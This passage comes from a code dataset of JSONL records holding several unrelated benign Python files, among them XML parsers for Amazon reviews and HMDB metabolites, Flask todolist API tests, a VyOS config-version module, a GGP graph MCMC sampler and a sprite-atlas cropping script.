rev_tx_rating.append(rev_xml.findtext(\"rating\"))\r\n\r\nrev_rating = []\r\nfor i in rev_tx_rating:\r\n rev_rating.append(float(i))\r\n \r\n \r\n## file save\r\n\r\nf = open(\"C:/Users/Woojin/Documents/GitHub/DomainAdaptation/Data/original amazon/electronics/elec_all_preprocessed.txt\",'wb')\r\npickle.dump(rev_data,f)\r\nf.close()\r\n\r\nf = open(\"C:/Users/Woojin/Documents/GitHub/DomainAdaptation/Data/original amazon/electronics/delec_all_label.txt\",'wb')\r\npickle.dump(rev_rating,f)\r\nf.close()\r\n","repo_name":"wj926/DA_dataset","sub_path":"xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74455113592","text":"import csv\nimport xml.etree.ElementTree as ET\ntree = ET.parse('saliva_metabolites.xml')\nroot = tree.getroot()\n#print(root)\nns ={'nsstring':'http://www.hmdb.ca'}\nheader = ['accession','pathway_name','smpdb_id','kegg_map_id','disease_name','omim_id','pubmed_id']\nbio_props = []\nwith open(\"saliva_paths_diseases.csv\",\"w\") as sal:\n writer= csv.writer(sal)\n for metabolite in root.findall('nsstring:metabolite', ns):\n accession = metabolite.find('nsstring:accession',ns) #Extract data at level#1\n for biological_properties in metabolite.findall('nsstring:biological_properties',ns):\n for pathways in 
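get_parent halves coordinates with a right shift, so it exactly inverts get_children one zoom level up; a round-trip check assuming the functions above are in scope:

```python
tile = (5, 10, 4)
children = get_children(tile)
print(children)   # [(10, 20, 5), (11, 20, 5), (11, 21, 5), (10, 21, 5)]
for child in children:
    assert get_parent(child) == tile   # each child shifts back to its parent
```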
biological_properties.findall('nsstring:pathways',ns):\n for pathway in pathways.findall('nsstring:pathway',ns):\n pathway_name= pathway.find('nsstring:name',ns)\n try:\n v_pathway_name = pathway_name.text\n except:\n v_pathway_name = 'unknown'\n smpdb_id= pathway.find('nsstring:smpdb_id',ns)\n try:\n v_smpdb_id = smpdb_id.text\n except:\n v_smpdb_id = 'unknown'\n kegg_map_id= pathway.find('nsstring:kegg_map_id',ns)\n try:\n v_kegg_map_id = kegg_map_id.text\n except:\n v_kegg_map_id = 'unknown'\n for diseases in metabolite.findall('nsstring:diseases',ns):\n for disease in diseases.findall('nsstring:disease',ns):\n disease_name=disease.find('nsstring:name',ns)\n try:\n v_disease_name = disease_name.text\n except:\n v_disease_name = 'unknown'\n omim_id= disease.find('nsstring:omim',ns)\n try:\n v_omim_id = omim_id.text\n except:\n v_omim_id = 'unknown'\n # print(disease_name.text,omim_id.text) #has Nonetype\n for references in disease.findall('nsstring:references',ns):\n for reference in references.findall('nsstring:reference',ns):\n ref_text=reference.find('nsstring:reference_text',ns)\n try:\n v_ref_text = ref_text.text\n except:\n v_ref_text = 'unknown'\n pubmed_id= reference.find('nsstring:pubmed_id',ns)\n try:\n v_pubmed_id = pubmed_id.text\n except:\n v_pubmed_id = 'unknown'\n bio_props.append([accession.text,v_pathway_name,v_smpdb_id,v_kegg_map_id,v_disease_name,v_omim_id,v_pubmed_id])\n writer.writerow(header)\n for row in bio_props:\n writer.writerow(row)\nsal.close()\n","repo_name":"aginnimb/Knowledgebase","sub_path":"saliva_paths_disease.py","file_name":"saliva_paths_disease.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34040763645","text":"import json\nimport unittest\nfrom flask import Flask\nfrom app import api_bp\nfrom config import TestConfig\nfrom models import db\nfrom flask_testing import TestCase\n\n\ndef create_test_app():\n app = Flask(__name__)\n app.config.from_object(TestConfig)\n app.register_blueprint(api_bp, url_prefix='/api')\n db.init_app(app)\n app.app_context().push()\n return app\n\n\nclass TestCase(TestCase):\n headers = {\n 'Accept': 'application/vnd.api+json',\n 'Content-Type': 'application/vnd.api+json'\n }\n\n def create_app(self):\n return create_test_app()\n\n def setUp(self):\n app = create_test_app()\n db.init_app(app)\n db.create_all()\n self.client = app.test_client()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_endpoints(self):\n response = self.client.get('/api/todolists')\n assert response.status_code == 200\n assert \"Hello, todolists is empty yet!\" in response.json['message']\n\n response = self.client.get('/api/tasks')\n assert response.status_code == 200\n assert \"Hello, tasks are not created yet!\" in response.json['message']\n\n def test_all(self):\n # create a todolist\n data = {\"name\": \"First list\"}\n response = self.client.post('/api/todolists', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n # assert \"First list\" in response.json.get('data')['name']\n todo = response.json.get('todolist')\n assert \"First list\" in todo['name']\n\n # check /todolists/id endpoint\n response = self.client.get('/api/todolists/'+str(todo['id']))\n assert response.status_code == 200\n assert 'todolist' in response.json\n assert response.json.get('todolist') == todo\n\n # create second todolist\n data = {\"name\": \"Second todo list\"}\n response = 
self.client.post('/api/todolists', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n todo2 = response.json.get('todolist')\n assert \"Second todo list\" in todo2['name']\n\n # create task\n data = {\"name\": \"First task\", \"todolist_id\": '1'}\n response = self.client.post('api/tasks', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n assert 'task' in response.json\n task = response.json['task']\n assert task['name'] == data['name']\n\n # create second task\n data = {\"name\": \"Second task\", \"todolist_id\": '2'}\n response = self.client.post('api/tasks', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n assert 'task' in response.json\n task2 = response.json['task']\n assert task2['name'] == data['name']\n\n # create third task\n data = {\"name\": \"Third task\", \"todolist_id\": '1'}\n response = self.client.post('api/tasks', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 201\n assert 'task' in response.json\n task3 = response.json['task']\n assert task3['name'] == data['name']\n\n # check /todolists/<id>/tasks\n response = self.client.get('api/todolists/'+str(todo['id'])+'/tasks', headers=self.headers)\n assert response.status_code == 200\n assert task in response.json['tasks']\n assert task2 not in response.json['tasks']\n\n response = self.client.get('api/todolists/' + str(todo2['id']) + '/tasks', headers=self.headers)\n assert response.status_code == 200\n assert task2 in response.json['tasks']\n assert task not in response.json['tasks']\n\n # check /tasks/\n response = self.client.get('api/tasks', headers=self.headers)\n assert response.status_code == 200\n assert task in response.json['tasks']\n assert task2 in response.json['tasks']\n\n # check /tasks/<id>\n response = self.client.get('api/tasks/' + str(task['id']), headers=self.headers)\n assert response.status_code == 200\n assert response.json['task'] == task\n assert response.json['task'] != task2\n\n # check /todolists/ endpoint content\n todo1 = (self.client.get('/api/todolists/1')).json['todolist']\n todo2 = (self.client.get('/api/todolists/2')).json['todolist']\n task1 = (self.client.get('/api/tasks/1')).json['task']\n\n task2 = (self.client.get('/api/tasks/2')).json['task']\n task3 = (self.client.get('/api/tasks/3')).json['task']\n # task1.pop('todolist_id', None)\n del task1['todolist_id']\n del task2['todolist_id']\n del task3['todolist_id']\n response = self.client.get('/api/todolists')\n assert response.status_code == 200\n assert 'todolists' in response.json\n\n todolists = response.json['todolists']\n assert todo1 in todolists\n assert todo2 in todolists\n assert task1 in todolists[0]['tasks']\n assert task3 in todolists[0]['tasks']\n assert task2 not in todolists[0]['tasks']\n\n assert task2 in todolists[1]['tasks']\n assert task1 not in todolists[1]['tasks']\n assert task3 not in todolists[1]['tasks']\n\n # test finish task\n assert task1['done'] is False\n data = {'done': True}\n response = self.client.put('/api/tasks/'+str(task1['id'])+'/finish', data=json.dumps(data), headers=self.headers)\n assert response.status_code == 204\n\n response = self.client.get('/api/tasks/'+str(task1['id']), headers=self.headers)\n assert response.json['task']['id'] == task1['id']\n assert response.json['task']['done'] is True\n\n # check TaskAddToList post /todolists/<int:todolist_id>/add_task/<int:task_id>\n # let's add task2 to todo1\n response = 
self.client.post('/api/todolists/'+str(todo1['id'])+'/add_task/'+str(task2['id']),\n data=json.dumps(data),\n headers=self.headers)\n assert response.status_code == 204\n todo1 = (self.client.get('/api/todolists/1')).json['todolist']\n task2 = (self.client.get('/api/tasks/2')).json['task']\n assert task2['todolist_id'] == 1\n del task2['todolist_id']\n assert task2 in todo1['tasks']\n\n # test editing task\n task2 = (self.client.get('/api/tasks/2')).json['task']\n data = {\"name\": \"Just other name\", \"todolist_id\": task2['todolist_id']}\n response = self.client.put('/api/tasks/'+str(task2['id']), data=json.dumps(data), headers=self.headers)\n assert response.status_code == 204\n task2 = (self.client.get('/api/tasks/2')).json['task']\n assert task2['name'] == data['name']\n\n # test delete task\n task2 = (self.client.get('/api/tasks/2')).json['task']\n response = self.client.delete('/api/tasks/'+str(task2['id']), headers=self.headers)\n assert response.status_code == 204\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ollavrova/todolist_api","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71736912314","text":"#ASSERT WITHOUT ERROR MSG\r\n\r\n#if assertion is True -> does nothing, goes to new line\r\n#if assertion is False -> throws assertion error\r\n\r\ndef avg(marks):\r\n assert len(marks) != 0\r\n return sum(marks)/len(marks)\r\n\r\nmark1 = [11, 22, 33]\r\nprint(avg(mark1)) #22.0\r\n\r\nmark2 = []\r\nprint(avg(mark2)) #AssertionError\r\n","repo_name":"dilshvn/python-flask-udemy","sub_path":"codes/assertion_without_error_msg.py","file_name":"assertion_without_error_msg.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"34871247341","text":"import os\nimport re\nimport sys\nimport fileinput\n\nfrom vyos.xml_ref import component_version\nfrom vyos.version import get_version\nfrom vyos.defaults import directories\n\nDEFAULT_CONFIG_PATH = os.path.join(directories['config'], 'config.boot')\n\ndef from_string(string_line, vintage='vyos'):\n \"\"\"\n Get component version dictionary from string.\n Return empty dictionary if string contains no config information\n or raise error if component version string malformed.\n \"\"\"\n version_dict = {}\n\n if vintage == 'vyos':\n if re.match(r'// vyos-config-version:.+', string_line):\n if not re.match(r'// vyos-config-version:\\s+\"([\\w,-]+@\\d+:)+([\\w,-]+@\\d+)\"\\s*', string_line):\n raise ValueError(f\"malformed configuration string: {string_line}\")\n\n for pair in re.findall(r'([\\w,-]+)@(\\d+)', string_line):\n version_dict[pair[0]] = int(pair[1])\n\n elif vintage == 'vyatta':\n if re.match(r'/\\* === vyatta-config-version:.+=== \\*/$', string_line):\n if not re.match(r'/\\* === vyatta-config-version:\\s+\"([\\w,-]+@\\d+:)+([\\w,-]+@\\d+)\"\\s+=== \\*/$', string_line):\n raise ValueError(f\"malformed configuration string: {string_line}\")\n\n for pair in re.findall(r'([\\w,-]+)@(\\d+)', string_line):\n version_dict[pair[0]] = int(pair[1])\n else:\n raise ValueError(\"Unknown config string vintage\")\n\n return version_dict\n\ndef from_file(config_file_name=DEFAULT_CONFIG_PATH, vintage='vyos'):\n \"\"\"\n Get component version dictionary parsing config file line by line\n \"\"\"\n with open(config_file_name, 'r') as f:\n for line_in_config in f:\n version_dict = 
from_string(line_in_config, vintage=vintage)\n if version_dict:\n return version_dict\n\n # no version information\n return {}\n\ndef from_system():\n \"\"\"\n Get system component version dict.\n \"\"\"\n return component_version()\n\ndef format_string(ver: dict) -> str:\n \"\"\"\n Version dict to string.\n \"\"\"\n keys = list(ver)\n keys.sort()\n l = []\n for k in keys:\n v = ver[k]\n l.append(f'{k}@{v}')\n sep = ':'\n return sep.join(l)\n\ndef version_footer(ver: dict, vintage='vyos') -> str:\n \"\"\"\n Version footer as string.\n \"\"\"\n ver_str = format_string(ver)\n release = get_version()\n if vintage == 'vyos':\n ret_str = (f'// Warning: Do not remove the following line.\\n'\n + f'// vyos-config-version: \"{ver_str}\"\\n'\n + f'// Release version: {release}\\n')\n elif vintage == 'vyatta':\n ret_str = (f'/* Warning: Do not remove the following line. */\\n'\n + f'/* === vyatta-config-version: \"{ver_str}\" === */\\n'\n + f'/* Release version: {release} */\\n')\n else:\n raise ValueError(\"Unknown config string vintage\")\n\n return ret_str\n\ndef system_footer(vintage='vyos') -> str:\n \"\"\"\n System version footer as string.\n \"\"\"\n ver_d = from_system()\n return version_footer(ver_d, vintage=vintage)\n\ndef write_version_footer(ver: dict, file_name, vintage='vyos'):\n \"\"\"\n Write version footer to file.\n \"\"\"\n footer = version_footer(ver=ver, vintage=vintage)\n if file_name:\n with open(file_name, 'a') as f:\n f.write(footer)\n else:\n sys.stdout.write(footer)\n\ndef write_system_footer(file_name, vintage='vyos'):\n \"\"\"\n Write system version footer to file.\n \"\"\"\n ver_d = from_system()\n return write_version_footer(ver_d, file_name=file_name, vintage=vintage)\n\ndef remove_footer(file_name):\n \"\"\"\n Remove old version footer.\n \"\"\"\n for line in fileinput.input(file_name, inplace=True):\n if re.match(r'/\\* Warning:.+ \\*/$', line):\n continue\n if re.match(r'/\\* === vyatta-config-version:.+=== \\*/$', line):\n continue\n if re.match(r'/\\* Release version:.+ \\*/$', line):\n continue\n if re.match('// vyos-config-version:.+', line):\n continue\n if re.match('// Warning:.+', line):\n continue\n if re.match('// Release version:.+', line):\n continue\n sys.stdout.write(line)\n","repo_name":"vyos/vyos-1x","sub_path":"python/vyos/component_version.py","file_name":"component_version.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"95"} +{"seq_id":"10359507359","text":"import time\n\nimport numpy as np\nfrom scipy.stats import poisson\nfrom scipy.sparse import triu, csr_matrix\nfrom scipy.special import gammaln\nfrom numpy import log, exp\n\nfrom .GGPutils import GGPpsi, GGPkappa, GGPsumrnd\n\n\ndef tpoissonrnd(lograte):\n # sample from a zero-truncated poisson distribution (support: strictly positive integer)\n x = np.ones(lograte.shape)\n ind = lograte > 1e-5 # below this value, x=1 w. very high prob.\n rate_ind = lograte[ind]\n x[ind] = poisson.ppf(exp(-rate_ind) + np.random.random(rate_ind.shape) * (1. - exp(-rate_ind)), rate_ind)\n return x\n\n\ndef grad_U(N, w, w_rem, sigma, tau):\n return -(N - sigma) + w * (tau + 2. * np.sum(w) + 2. * w_rem)\n\n\ndef update_n_Gibbs(logw, K, ind1, ind2):\n lograte_poi = log(2.) + logw[ind1] + logw[ind2]\n lograte_poi[ind1 == ind2] = 2. 
* logw[ind1[ind1 == ind2]]\n    d = tpoissonrnd(lograte_poi)\n    count = csr_matrix((d, (ind1, ind2)), (K, K))\n    N = count.sum(0).T + count.sum(1)\n\n    return N, d, count\n\n\ndef update_n_MH(logw, d, K, count, ind1, ind2, nbMH):\n    for i in range(nbMH):\n        lograte_poi = log(2.) + logw[ind1] + logw[ind2]\n        lograte_poi[ind1 == ind2] = 2. * logw[ind1[ind1 == ind2]]\n        ind = d == 1\n        dprop = d.copy()\n        dprop[ind] = 2\n        if np.sum(ind == 0) > 0:\n            dprop[ind == 0] = dprop[ind == 0] + 2. * np.random.randint(0, 2, size=np.sum(ind == 0)) - 3\n\n        logqprop = np.zeros(ind.shape)\n        logqprop[ind == 0] = log(.5)\n\n        indbis = dprop == 1\n        logq = np.zeros(indbis.shape)\n        if np.sum(indbis == 0) > 0:\n            logq[indbis == 0] = log(.5)\n\n        diff_d = (dprop - d)\n        logaccept_d = diff_d * lograte_poi - gammaln(dprop + 1.) + gammaln(d + 1.) - logqprop + logq\n        logaccept_d[np.isnan(logaccept_d)] = -np.Inf\n        indaccept = log(np.random.random(logaccept_d.shape)) < logaccept_d\n        d[indaccept] = dprop[indaccept]\n        count += csr_matrix((diff_d[indaccept], (ind1[indaccept], ind2[indaccept])), (K, K))\n        N = count.sum(0).T + count.sum(1)\n\n    return N, d, count\n\n\ndef update_w(w, logw, w_rem, N, L, epsilon, sigma, tau, issimple):\n    sum_w = np.sum(w)\n    sumall_w = sum_w + w_rem\n\n    K = len(w)\n    logwprop = logw\n    p = np.random.normal(size=(K))\n    grad1 = grad_U(N, w, w_rem, sigma, tau)\n    pprop = p - epsilon * grad1 / 2.\n\n    for lp in range(L):\n        logwprop = logwprop + epsilon * pprop\n        if lp != L - 1:\n            pprop = pprop - epsilon * grad_U(N, exp(logwprop), w_rem, sigma, tau)\n\n    wprop = exp(logwprop)\n    pprop = pprop - epsilon / 2. * grad_U(N, wprop, w_rem, sigma, tau)\n\n    sum_wprop = np.sum(wprop)\n    sumall_wprop = sum_wprop + w_rem\n    temp1 = -sumall_wprop ** 2. + sumall_w ** 2 + np.sum(\n        (N - sigma - 1.) * (logwprop - logw) - tau * (sum_wprop - sum_w))\n\n    logaccept = temp1 - .5 * np.sum(pprop ** 2 - p ** 2) - np.sum(logw) + np.sum(logwprop)\n    if issimple:\n        logaccept += np.sum(wprop ** 2) - np.sum(w ** 2)\n\n    if np.isnan(logaccept):\n        logaccept = -np.Inf\n\n    if log(np.random.random()) < logaccept:\n        w = wprop\n        logw = logwprop\n\n    rate = min(1., exp(logaccept))\n    return w, logw, rate\n\n\ndef update_hyper(w, logw, w_rem, alpha, logalpha, sigma,\n                 tau, nbMH, rw_std, estimate_alpha, estimate_sigma, estimate_tau,\n                 hyper_alpha, hyper_sigma, hyper_tau, rw_alpha):\n    K = len(w)\n    for nn in range(nbMH):\n        sum_w = np.sum(w)\n        sumall_w = sum_w + w_rem\n\n        # Sample (alpha, sigma, tau, w*) from the proposal distribution\n        if estimate_sigma:\n            sigmaprop = 1. - exp(log(1 - sigma) + rw_std[0] * np.random.normal())\n        else:\n            sigmaprop = sigma\n\n        if estimate_tau:\n            tauprop = exp(log(tau) + rw_std[1] * np.random.normal())\n        else:\n            tauprop = tau\n\n        if sigmaprop > -1.:\n            if estimate_alpha:\n                if rw_alpha == 0:\n                    alphaprop = np.random.gamma(K, 1. / (GGPpsi(2. * sum_w + 2. * w_rem, 1., sigmaprop, tauprop)))\n                else:\n                    alphaprop = alpha * exp(.02 * np.random.normal())\n                logalphaprop = log(alphaprop)\n            else:\n                alphaprop = alpha\n                logalphaprop = logalpha\n\n            wprop_rem = GGPsumrnd(alphaprop, sigmaprop, tauprop + 2. * sum_w + 2. * w_rem)\n        else:\n            if estimate_alpha:\n                if rw_alpha == 0:\n                    alpha2prop = np.random.gamma(K,\n                                                 1. / (GGPpsi((2. * sum_w + 2. * w_rem) / tauprop, 1., sigmaprop, 1.)))\n                    logalphaprop = log(alpha2prop) - sigmaprop * log(tauprop)\n                else:\n                    logalphaprop = logalpha + .02 * np.random.normal()\n                alphaprop = exp(logalphaprop)\n                rate_K = exp(logalphaprop - log(-sigmaprop) + sigmaprop * log(tauprop + 2. * sum_w + 2. 
* w_rem))\n num_clust = np.random.poisson(rate_K)\n if num_clust == 0:\n wprop_rem = 0\n else:\n wprop_rem = np.random.gamma(-sigmaprop * num_clust, 1. / (tauprop + 2. * sum_w + 2. * w_rem))\n else:\n alphaprop = alpha\n logalphaprop = logalpha\n wprop_rem = GGPsumrnd(alphaprop, sigmaprop, tauprop + 2. * sum_w + 2. * w_rem)\n\n # compute the acceptance probability\n sum_wprop = np.sum(w)\n sumall_wprop = sum_wprop + wprop_rem\n\n temp1 = -sumall_wprop ** 2. + sumall_w ** 2. + (sigma - sigmaprop) * np.sum(logw) \\\n - (tauprop - tau - 2. * wprop_rem + 2. * w_rem) * sum_w\n temp2 = K * (gammaln(1. - sigma) - gammaln(1. - sigmaprop))\n\n logaccept = temp1 + temp2\n if estimate_alpha:\n if rw_alpha == 0:\n logaccept += K * (\n log(GGPpsi((2. * sum_wprop + 2. * wprop_rem) / tau, 1., sigma, 1.)) + sigma * log(tau) - log(\n (GGPpsi((2. * sum_w + 2. * w_rem) / tauprop, 1., sigmaprop, 1.))) - sigmaprop * log(tauprop))\n else:\n logaccept -= exp(logalphaprop + sigmaprop * log(tauprop)) * GGPpsi(\n (2. * sum_w + 2. * w_rem) / tauprop, 1., sigmaprop, 1.) + exp(logalpha + sigma * log(tau)) * GGPpsi(\n (2. * sum_wprop + 2. * wprop_rem) / tau, 1., sigma, 1.)\n + K * (logalphaprop - logalpha)\n if hyper_alpha[0] > 0:\n logaccept += hyper_alpha[0] * (logalphaprop - logalpha)\n if hyper_alpha[1] > 0:\n logaccept -= hyper_alpha[1] * (alphaprop - alpha)\n\n logaccept -= GGPpsi(2. * sum_w + 2. * w_rem, alphaprop, sigmaprop, tauprop) + GGPpsi(\n 2. * sum_wprop + 2. * wprop_rem, alpha, sigma, tau)\n\n if estimate_tau:\n logaccept += hyper_tau[0] * (log(tauprop) - log(tau)) - hyper_tau[1] * (tauprop - tau)\n if estimate_sigma:\n logaccept += hyper_sigma[0] * (log(1. - sigmaprop) - log(1. - sigma)) - hyper_sigma[1] * (\n 1. - sigmaprop - 1. + sigma)\n\n if np.isnan(logaccept):\n raise Exception(\"Cannot compute acceptance probability\")\n\n if log(np.random.random()) < logaccept:\n w_rem = wprop_rem\n alpha = alphaprop\n logalpha = logalphaprop\n sigma = sigmaprop\n tau = tauprop\n rate2 = min(1., exp(logaccept))\n\n return w_rem, alpha, logalpha, sigma, tau, rate2\n\n\ndef GGPgraphmcmc(G, modelparam, mcmcparam, typegraph, verbose=True):\n \"\"\"\n Run MCMC for the GGP graph model\n\n\n Convert the same function used in BNPGraph matlab package by Francois Caron\n http://www.stats.ox.ac.uk/~caron/code/bnpgraph/index.html\n\n :param G:sparse logical adjacency matrix\n :param modelparam: dictionary of model parameters with the following fields:\n - alpha: if scalar, the value of alpha. If vector of length\n 2, parameters of the gamma prior over alpha\n - sigma: if scalar, the value of sigma. If vector of length\n 2, parameters of the gamma prior over (1-sigma)\n - tau: if scalar, the value of tau. If vector of length\n 2, parameters of the gamma prior over tau\n :param mcmcparam: dictionary of mcmc parameters with the following fields:\n - niter: number of MCMC iterations\n - nburn: number of burn-in iterations\n - thin: thinning of the MCMC output\n - leapfrog.L: number of leapfrog steps\n - leapfrog.epsilon: leapfrog stepsize\n - leapfrog.nadapt: number of iterations for adaptation (default:nburn/2)\n - latent.MH_nb: number of MH iterations for latent (if 0: Gibbs update)\n - hyper.MH_nb: number of MH iterations for hyperparameters\n - hyper.rw_std: standard deviation of the random walk\n - store_w: logical. If true, returns MCMC draws of w\n :param typegraph: type of graph ('undirected' or 'simple') simple graph does\n not contain any self-loop\n :param verbose: logical. 
If true (default), print information\n    :return:\n        - samples: dictionary with the MCMC samples for the variables\n            - w\n            - w_rem\n            - alpha\n            - logalpha\n            - sigma\n            - tau\n        - stats: dictionary with summary stats about the MCMC algorithm\n            - w_rate: acceptance rate of the HMC step at each iteration\n            - hyper_rate: acceptance rate of the MH for the hyperparameters at\n            each iteration\n    \"\"\"\n\n    # if not G is G.T or not len(np.unique(G.data)) != 1:\n    #     raise Exception(\"Adjacency matrix G must be a symmetric binary matrix\")\n\n    if typegraph == 'simple':\n        issimple = True\n    else:\n        issimple = False\n\n    if not np.iterable(modelparam['alpha']):\n        alpha = modelparam['alpha']\n        estimated_alpha = 0\n    else:\n        alpha = 100. * np.random.random()\n        estimated_alpha = 1\n\n    logalpha = log(alpha)\n\n    if not np.iterable(modelparam['sigma']):\n        sigma = modelparam['sigma']\n        estimated_sigma = 0\n    else:\n        sigma = 2. * np.random.random() - 1.\n        estimated_sigma = 1\n\n    if not np.iterable(modelparam['tau']):\n        tau = modelparam['tau']\n        estimated_tau = 0\n    else:\n        tau = 10. * np.random.random()\n        estimated_tau = 1\n\n    K = G.shape[0]  # nodes\n\n    if issimple:\n        G2 = triu(G + G.T, k=1)\n    else:\n        G2 = triu(G + G.T, k=0)\n\n    ind1, ind2 = G2.nonzero()\n\n    n = np.random.randint(1, 9, size=len(ind1))\n    count = csr_matrix((n, (ind1, ind2)), (K, K), dtype=int)\n    N = count.sum(0).T + count.sum(1)\n    w = np.random.gamma(1., 1., size=K)\n    logw = log(w)\n    w_rem = np.random.gamma(1., 1.)\n\n    # parameters of the MCMC algorithm\n    niter = mcmcparam['niter']\n    nburn = mcmcparam['nburn']\n    thin = mcmcparam['thin']\n    L = mcmcparam['leapfrog.L']\n    epsilon = mcmcparam['leapfrog.epsilon'] / K ** (1. / 4.)\n\n    # To store MCMC samples\n    n_samples = int((niter - nburn) / thin)\n    w_st = np.zeros((n_samples, K))\n    w_rem_st = np.zeros(n_samples)\n    alpha_st = np.zeros(n_samples)\n    logalpha_st = np.zeros(n_samples)\n    tau_st = np.zeros(n_samples)\n    sigma_st = np.zeros(n_samples)\n\n    rate = np.zeros(niter)\n    rate2 = np.zeros(niter)\n\n    tic = time.time()\n    for i in range(niter):\n        if verbose and i % 2000 == 0:\n            print('Iteration=%d' % i, flush=True)\n            print('\\talpha = %.2f' % alpha, flush=True)\n            print('\\tsigma = %.3f' % sigma, flush=True)\n            print('\\ttau = %.3f' % tau, flush=True)\n\n        # update w using Hamiltonian Monte Carlo\n        w, logw, rate[i] = update_w(w, logw, w_rem, N, L, epsilon, sigma, tau, issimple)\n        if i < mcmcparam['leapfrog.nadapt']:\n            epsilon = exp(log(epsilon) + .01 * (np.mean(rate[:i + 1]) - 0.6))\n\n        # update w_rem and hyperparameters using Metropolis-Hastings\n        if i % 2 == 0:\n            rw_alpha = True\n        else:\n            rw_alpha = False\n\n        w_rem, alpha, logalpha, sigma, tau, rate2[i] = update_hyper(w, logw, w_rem, alpha, logalpha, sigma, tau,\n                                                                    mcmcparam['hyper.MH_nb'], mcmcparam['hyper.rw_std'],\n                                                                    estimated_alpha, estimated_sigma, estimated_tau,\n                                                                    modelparam['alpha'], modelparam['sigma'],\n                                                                    modelparam['tau'],\n                                                                    rw_alpha)\n\n        if mcmcparam['latent.MH_nb'] == 0:\n            N, n, count = update_n_Gibbs(logw, K, ind1, ind2)\n        else:\n            N, n, count = update_n_MH(logw, n, K, count, ind1, ind2, mcmcparam['latent.MH_nb'])\n\n        if np.isnan(alpha):\n            raise Exception('alpha is not a number')\n\n        # Print text at start\n        if i == 10:\n            toc = (time.time() - tic) * niter / 10.\n            hours = np.floor(toc / 3600)\n            minutes = (toc - hours * 3600.) 
/ 60.\n print('-----------------------------------', flush=True)\n print('Start MCMC for GGP graphs', flush=True)\n print('Nb of nodes: %d - Nb of edges: %d' % (K, G2.sum()), flush=True)\n print('Number of iterations: %d' % niter, flush=True)\n print('Estimated computation time: %.0f hour(s) %.0f minute(s)' % (hours, minutes), flush=True)\n print('Estimated end of computation: ', time.strftime('%b %dth, %H:%M:%S', time.localtime(tic + toc)),\n flush=True)\n print('-----------------------------------', flush=True)\n\n if i > nburn and (i - nburn) % thin == 0:\n ind = int((i - nburn) / thin)\n if mcmcparam['store_w']:\n w_st[ind] = w\n w_rem_st[ind] = w_rem\n logalpha_st[ind] = logalpha\n alpha_st[ind] = alpha\n sigma_st[ind] = sigma\n tau_st[ind] = tau\n\n samples = dict()\n samples['w'] = w_st\n samples['w_rem'] = w_rem_st\n samples['alpha'] = alpha_st\n samples['logalpha'] = logalpha_st\n samples['sigma'] = sigma_st\n samples['tau'] = tau_st\n\n stats = dict()\n stats['w_rate'] = rate\n stats['hyper_rate'] = rate2\n\n toc = time.time() - tic\n hours = np.floor(toc / 3600)\n minutes = (toc - hours * 3600.) / 60.\n print('-----------------------------------', flush=True)\n print('End MCMC for GGP graphs', flush=True)\n print('Computation time: %.0f hour(s) %.0f minute(s)' % (hours, minutes), flush=True)\n print('End of computation: ', time.strftime('%b %dth, %H:%M:%S', time.localtime(time.time())), flush=True)\n print('-----------------------------------', flush=True)\n\n return samples, stats\n","repo_name":"dongwookim-ml/sparse-graph-prior","sub_path":"sgp/GGPgraphmcmc.py","file_name":"GGPgraphmcmc.py","file_ext":"py","file_size_in_byte":14953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"19648644943","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport sys\nimport os.path\nimport shutil\nfrom PIL import Image\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\")\nargs = parser.parse_args()\n\nfileName = args.name\n\nif fileName.find('.png') != -1:\n fileName = fileName[:-4]\n\npngName = fileName + '.png'\natlasName = fileName + '.atlas'\n\nprint(pngName, atlasName)\n\nbig_image = Image.open(pngName)\n\n\ncurPath = os.getcwd() # 当前路径\naim_path = os.path.join(curPath, fileName)\nprint(aim_path)\nif os.path.isdir(aim_path):\n shutil.rmtree(aim_path, True) # 如果有该目录,删除\nos.makedirs(aim_path)\n#\ncontent = \"\"\nwith open(atlasName, encoding='utf-8') as fp:\n while True:\n c = fp.readline()\n if len(c) == 0:\n break\n content += c\n\ndata = json.loads(content)\n\nfor k in data[\"frames\"].keys():\n print(k)\n #{'frame': {'x': 572, 'y': 668, 'w': 260, 'h': 127, 'idx': 0}, 'spriteSourceSize': {'x': 68, 'y': 226}, 'sourceSize': {'w': 500, 'h': 500}}\n frame = data[\"frames\"][k][\"frame\"]\n print(data[\"frames\"][k])\n width = frame[\"w\"]\n height = frame[\"h\"]\n ltx = frame[\"x\"]\n lty = frame[\"y\"]\n rbx = ltx+width\n rby = lty+height\n result_image = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n rect_on_big = big_image.crop((ltx, lty, rbx, rby))\n result_image.paste(rect_on_big, (0, 0, width, height))\n result_image.save(aim_path+'/'+k)\n\ndel big_image\n","repo_name":"ankye/croppng","sub_path":"src/atlas.py","file_name":"atlas.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32947184363","text":"from django.test import TestCase\nfrom .models import Feature\n\nclass 
